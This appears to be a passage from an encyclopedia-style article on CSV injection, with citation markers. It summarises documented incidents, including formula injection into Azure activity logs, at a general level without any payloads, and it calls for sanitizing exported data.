Real-world incidents of CSV injection have been documented in phishing campaigns since 2017, often involving malicious attachments that exploit trusted sources to deliver payloads via exported reports or logs.[35] A notable case in Microsoft Azure involved attackers injecting formulas into activity logs, which administrators could download as CSV files and open in Excel, leading to command execution on the victim's machine; this vulnerability affected shared environments and highlighted risks for cloud-based data exports.[35] Similar exploits have targeted web applications and reporting tools, resulting in credential theft or malware deployment, underscoring the need for proactive sanitization in data-handling workflows.[32]